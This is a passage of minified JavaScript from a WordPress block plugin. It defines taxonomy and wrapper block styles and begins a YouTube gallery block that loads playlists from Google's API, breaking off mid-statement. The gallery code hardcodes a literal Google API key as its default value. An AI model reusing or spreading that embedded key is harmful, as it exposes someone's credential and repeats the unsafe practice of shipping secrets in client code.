{{ULTP}} .ultp-taxonomy-layout-5 a img {object-fit: cover; height: {{imgHeight}}; }"}]},imgSpacing:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img,  \n          {{ULTP}} .ultp-taxonomy-layout-5 a img { margin-bottom: {{imgSpacing}}px; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; }"}]},contentWrapBg:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-item a .ultp-taxonomy-lt5-content { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-item a:hover .ultp-taxonomy-lt5-content { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover"}]},contentWrapPadding:{type:"object",default:{lg:{unit:"px",top:"6",right:"12",bottom:"6",left:"12"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,\n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,\n          {{ULTP}} .ultp-taxonomy-item a .ultp-taxonomy-lt5-content { padding: {{contentWrapPadding}}; }"}]},customTaxColor:{type:"boolean",default:!1},seperatorTaxLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxColor",condition:"==",value:!0}]}]},TaxAnimation:{type:"string",default:"none"},TaxWrapBg:{type:"string",default:"",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt8-overlay { background:{{TaxWrapBg}}; }"}]},TaxWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]},{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt2-overlay,\n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt3-overlay, \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt8-overlay { background:{{TaxWrapHoverBg}}; }"}]},TaxWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a"}]},TaxWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover"}]},TaxWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a"}]},TaxWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover"}]},TaxWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a { border-radius: {{TaxWrapRadius}}; }"}]},TaxWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover { border-radius: {{TaxWrapHoverRadius}}; }"}]},customOpacityTax:{type:"string",default:.6,style:[{selector:"{{ULTP}} .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt8-overlay { opacity: {{customOpacityTax}}; }"}]},customTaxOpacityHover:{type:"string",default:.9,style:[{selector:"{{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt8-overlay { opacity: {{customTaxOpacityHover}}; }"}]},TaxWrapPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a { padding: {{TaxWrapPadding}}; }"}]},titleTag:{type:"string",default:"span"},contentTitleAlign:{type:"string",default:"left",style:[{depends:[{key:"layout",condition:"==",value:"1"},{key:"countShow",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap ul li a { justify-content: {{contentTitleAlign}};}"}]},titlePosition:{type:"boolean",default:!0},customTaxTitleColor:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:["2","3","6"]}]}]},seperatorTaxTitleLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!0},{key:"layout",condition:"!=",value:["2","3","6"]}]}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { color:{{titleColor}}; }"},{depends:[{key:"layout",condition:"==",value:["2","3","6"]}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { color:{{titleColor}}; }"}]},TitleBgColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"layout",condition:"==",value:["7","8"]},{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-taxonomy-layout-7 .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-taxonomy-layout-8 .ultp-taxonomy-name { background:{{TitleBgColor}}; }"}]},TitleBgHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"layout",condition:"==",value:["7","8"]},{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-taxonomy-layout-7 li a:hover .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-taxonomy-layout-8 li a:hover .ultp-taxonomy-name { background:{{TitleBgHoverColor}}; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-block-item a:hover .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-block-item a:hover .ultp-taxonomy-count { color:{{titleHoverColor}}!important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name"}]},titleDotColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-color:{{titleDotColor}}; }"}]},titleDotHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 li:hover a .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 li:hover a .ultp-taxonomy-bar { border-bottom-color:{{titleDotHoverColor}}; }"}]},titleDotSize:{type:"string",default:"solid",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-width:{{titleDotSize}}px; }"}]},titleDotStyle:{type:"string",default:{lg:"1"},style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-style: {{titleDotStyle}}; }"}]},titlePadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { padding:{{titlePadding}}; }"}]},titleRadius:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:["7","8"]}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { border-radius:{{titleRadius}}; }"}]},excerptLimit:{type:"string",default:30},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-desc { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-desc"}]},excerptPadding:{type:"object",default:{lg:{top:"0",bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-desc { padding: {{excerptPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterWidth:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { max-width:{{counterWidth}}px; width: 100% }"}]},counterHeight:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { height:{{counterHeight}}px; line-height:{{counterHeight}}px !important; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count"}]},counterRadius:{type:"object",default:{lg:{top:"22",right:"22",bottom:"22",left:"22",unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-count { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1,depends:[{key:"taxGridEn",condition:"!=",value:!0}]},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"solid",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"5"},style:[{depends:[{key:"taxGridEn",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:last-of-type) { padding-bottom: {{septSpace}}px; }  \n          {{ULTP}} .ultp-block-item:not(:last-of-type) { margin-bottom: {{septSpace}}px; }"}]},headingText:{type:"string",default:"Post Taxonomy"},...(0,o.t)(["advanceAttr","heading"],["loadingColor"]),V4_1_0_CompCheck:a.O}},36653:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(43239),n=l(60816),r=l(34433);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/ultp-taxonomy.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Listing your Taxonomy in grid / list view.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/taxonomy.svg"}},edit:i.Z,save:()=>null})},45478:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(92637);const{__}=wp.i18n,{InspectorControls:r,InnerBlocks:s,useBlockProps:p}=wp.blockEditor,{useState:c,useEffect:u,Fragment:d}=wp.element,{getBlockAttributes:m,getBlockRootClientId:g}=wp.data.select("core/block-editor");function y(e){const[t,l]=c("Content"),{setAttributes:y,className:b,clientId:v,name:h,attributes:f,attributes:{blockId:k,currentPostId:w,previewImg:x,advanceId:T}}=e;u((()=>{const e=v.substr(0,6),t=m(g(v));(0,a.qi)(y,t,w,v),k?k&&k!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e})}),[v]);const _={setAttributes:y,name:h,attributes:f,setSection:l,section:t,clientId:v};let C;if(k&&(C=(0,i.Kh)(f,"ultimate-post/wrapper",k,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const E=p({...T&&{id:T},className:`ultp-block-${k} ${b}`});return(0,o.createElement)(d,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:_})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:_}),(0,o.createElement)(a.iv,{store:_}))),(0,a.dH)()),(0,o.createElement)("div",E,C&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:C}}),(0,o.createElement)("div",{className:"ultp-wrapper-block"},(0,o.createElement)(s,{templateLock:!1}))))}},33453:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l}=e.attributes,a=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",a,(0,o.createElement)("div",{className:"ultp-wrapper-block"},(0,o.createElement)(i.Content,null)))}},38023:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},advanceId:{type:"string",default:""},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapBg",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block"}]},{key:"wrapRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block { border-radius:{{wrapRadius}}; }"}]},{key:"wrapHoverBackground",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverBorder",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapHoverRadius",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover { border-radius:{{wrapHoverRadius}}; }"}]},{key:"wrapHoverShadow",style:[{selector:"{{ULTP}} .ultp-wrapper-block:hover"}]},{key:"wrapMargin",style:[{selector:"{{ULTP}} .ultp-wrapper-block { margin:{{wrapMargin}}; }"}]},{key:"wrapOuterPadding",default:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]},{key:"advanceZindex",style:[{selector:"{{ULTP}} .ultp-wrapper-block { padding:{{wrapOuterPadding}}; }"}]}])}},35391:(e,t,l)=>{"use strict";var o=l(67294),a=l(45478),i=l(33453),n=l(38023),r=l(52031);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/wrapper.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/wrapper.svg"}},edit:a.Z,save:i.Z})},93673:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(68533),s=l(89524);const{getBlockAttributes:p,getBlockRootClientId:c}=wp.data.select("core/block-editor"),{useEffect:u,Fragment:d}=wp.element,{useBlockProps:m}=wp.blockEditor,g=e=>{const{setAttributes:t,name:l,className:g,attributes:y,clientId:b,attributes:{blockId:v,previewImg:h,advanceId:f,currentPostId:k,playlistIdOrUrl:w,youTubeApiKey:x,cacheDuration:T,sortBy:_,galleryLayout:C,videosPerPage:E,showVideoTitle:S,videoTitleLength:P,loadMoreEnable:L,moreButtonLabel:I,autoplay:B,autoplayPlaylist:U,loop:M,mute:A,showPlayerControl:H,hideYoutubeLogo:N,showDescription:j,videoDescriptionLength:Z,imageHeightRatio:O,enableListView:R,displayType:D,enablePopup:z,playIcon:F,galleryColumn:W,columns:V,enableAnimation:G,defaultYoutubeIcon:q,layout:$}}=e;let K;if(u((()=>{const e=b.substr(0,6),l=p(c(b));(0,a.qi)(t,l,k,b),v?v&&v!=e&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||t({blockId:e})):t({blockId:e}),t({className:g})}),[b]),v&&(K=(0,i.Kh)(y,"ultimate-post/youtube-gallery",v,(0,a.k0)())),h)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:h,alt:""});const J={setAttributes:t,name:l,attributes:y,clientId:b},Y={playlistId:w,playlistUrl:w,youTubeApiKey:x,cacheDuration:T,sortBy:_,galleryLayout:$,videosPerPage:E,showVideoTitle:S,videoTitleLength:P,loadMoreEnable:L,moreButtonLabel:I,autoplay:B,autoplayPlaylist:U,loop:M,mute:A,showPlayerControl:H,hideYoutubeLogo:N,showDescription:j,videoDescriptionLength:Z,imageHeightRatio:O,enableListView:R,displayType:D,enablePopup:z,galleryColumn:W,columns:V,playIcon:F,enableAnimation:G,setAttributes:t,defaultYoutubeIcon:q},X=m({...f&&{id:f},className:`ultp-block-${v} ${g}`});return(0,o.createElement)(d,null,(0,o.createElement)(r.Z,{store:J}),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:J}),(0,o.createElement)("div",X,K&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:K}}),(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-ytg-block ultp-wrapper-block"},(0,o.createElement)(s.Z,Y))))}},89524:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(34774),i=l(83100),n=l(64766),r=l(60307);const{Spinner:s,Placeholder:p}=wp.components,{useState:c,useEffect:u}=wp.element,{__}=wp.i18n,d=({video:e,isActive:t,onClick:l,videoTitleLength:a,showDescription:i,imageHeightRatio:n,videoDescriptionLength:s})=>{const[,p]=c({});return u((()=>{const e=()=>p({});return window.addEventListener("resize",e),()=>window.removeEventListener("resize",e)}),[]),(0,o.createElement)("div",{className:"ultp-ytg-playlist-item "+(t?"active":""),onClick:l},(0,o.createElement)("img",{src:e.thumbnail,alt:e.title,loading:"lazy"}),(0,o.createElement)("div",{className:"ultp-ytg-playlist-item-content"},(0,o.createElement)("div",{className:"ultp-ytg-playlist-item-title"},(0,r.aF)(e.title,a))))},m=({video:e,isPlaying:t,onSelect:l,showVideoTitle:a=!0,showDescription:i=!1,videoTitleLength:s={lg:50,md:50,sm:50},videoDescriptionLength:p={lg:100,md:100,sm:100},autoplay:d=!1,loop:m=!1,mute:g=!1,showPlayerControl:y=!0,hideYoutubeLogo:b=!1,imageHeightRatio:v="16-9",customImgHeight:h=null,playIcon:f,enableAnimation:k,defaultYoutubeIcon:w})=>{const[x,T]=c(!1),[_,C]=c({width:window.innerWidth,height:window.innerHeight}),[E,S]=c(!1);return u((()=>{function e(){C({width:window.innerWidth,height:window.innerHeight})}return window.addEventListener("resize",e),()=>window.removeEventListener("resize",e)}),[]),(0,o.createElement)("div",{className:"ultp-ytg-item"+(t?" active":"")},(0,o.createElement)("div",{className:"ultp-ytg-video "+(E?"loading-active":"")},t?(0,o.createElement)(r.Y7,{video:e,autoplay:d,loop:m,mute:g,showPlayerControl:y,hideYoutubeLogo:b,showVideoTitle:a,showDescription:i,videoTitleLength:s,videoDescriptionLength:p,onlyVideo:!0}):E?(0,o.createElement)("div",{className:"ultp-ytg-loading"},(0,o.createElement)("div",{className:"ytg-loader"})):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("img",{src:e.thumbnail,alt:e.title,loading:"lazy"}),(0,o.createElement)("div",{className:"ultp-ytg-play__icon "+(k?"ytg-icon-animation":""),onClick:()=>{S(!0),setTimeout((()=>{S(!1),l()}),1e3)}},w?(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.57  20",focusable:"false"},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.57 20",preserveAspectRatio:"xMidYMid meet"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M27.9727 3.12324C27.6435 1.89323 26.6768 0.926623 25.4468 0.597366C23.2197 2.24288e-07 14.285 0 14.285 0C14.285 0 5.35042 2.24288e-07 3.12323 0.597366C1.89323 0.926623 0.926623 1.89323 0.597366 3.12324C2.24288e-07 5.35042 0 10 0 10C0 10 2.24288e-07 14.6496 0.597366 16.8768C0.926623 18.1068 1.89323 19.0734 3.12323 19.4026C5.35042 20 14.285 20 14.285 20C14.285 20 23.2197 20 25.4468 19.4026C26.6768 19.0734 27.6435 18.1068 27.9727 16.8768C28.5701 14.6496 28.5701 10 28.5701 10C28.5701 10 28.5677 5.35042 27.9727 3.12324Z",fill:"#FF0000"}),(0,o.createElement)("path",{d:"M11.4253 14.2854L18.8477 10.0004L11.4253 5.71533V14.2854Z",fill:"white"})))):n.ZP[f]))),(0,o.createElement)("div",{className:"ultp-ytg-inside"},(0,r.eT)(a,e.title,s,i,e.description,p,e.videoId)))},g=({galleryLayout:e="inline",playlistId:t,playlistUrl:l,youTubeApiKey:n="AIzaSyDfov7YEgMiJgMtNh2WJYF2YC9J7jR4FeM",cacheDuration:s="0",sortBy:p="date",videosPerPage:g={lg:9,md:6,sm:3},showVideoTitle:y=!0,videoTitleLength:b={lg:50,md:50,sm:50},loadMoreEnable:v=!1,moreButtonLabel:h="More Videos",galleryColumn:f={lg:3,md:2,sm:1},autoplay:k=!1,loop:w=!1,mute:x=!1,showPlayerControl:T=!0,hideYoutubeLogo:_=!1,showDescription:C=!0,videoDescriptionLength:E={lg:100,md:100,sm:100},imageHeightRatio:S="16-9",enableListView:P=!1,enablePopup:L=!1,displayType:I="grid",playIcon:B,enableAnimation:U,autoplayPlaylist:M,setAttributes:A,defaultYoutubeIcon:H})=>{const[N,j]=c([]),[Z,O]=c(!1),[R,D]=c(""),[z,F]=c(!0),[W,V]=c(null),[G,q]=c(g.lg||9),[$,K]=c(G),[J,Y]=c(f.lg||3),[X,Q]=c(null),ee=(0,r.v8)(t||l),te=(n&&n.length,wp.data.useSelect((e=>e("core").getEntityRecord("root","site")),[])),le=te?JSON.parse(te["ytvgb-video-gallery"]||"{}").key:"",oe=n||le;if(oe&&oe.length,u((()=>{let e=!0;return async function(){if(!ee)return j([]),void D("Please enter a valid YouTube API Key to load your videos");if(!oe)return j([]),F(!1),void D("Please enter a valid Developer API Key to load your videos");O(!0),D("");let t=ee,l=!1;if(t&&t.startsWith("UC")&&24===t.length&&(l=!0),l)try{t=await(async(e,t)=>{const l=await fetch(`https://www.googleapis.com/youtube/v3/channels?part=contentDetails&id=${e}&key=${t}`),o=await l.json();return o.items?.[0]?.contentDetails?.relatedPlaylists?.uploads||null})(t,oe)}catch(e){return D("Failed to fetch channel uploads playlist."),j([]),void O(!1)}if(!t)return D("Invalid playlist or channel ID."),j([]),void O(!1);const o=`ultp_youtube_gallery_${t}_${oe}_${p}_${S}`,a=parseInt(s,10)||0;let i=null;try{i=JSON.parse(localStorage.getItem(o))}catch(e){i=null}const n=Date.now();if(i&&i.data&&i.timestamp&&a>0&&n-i.timestamp<1e3*a){const t=(0,r.Qc)(i.data,p);e&&(j(t),O(!1))}else try{const e=await fetch(`https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=500&playlistId=${t}&key=${oe}`),l=await 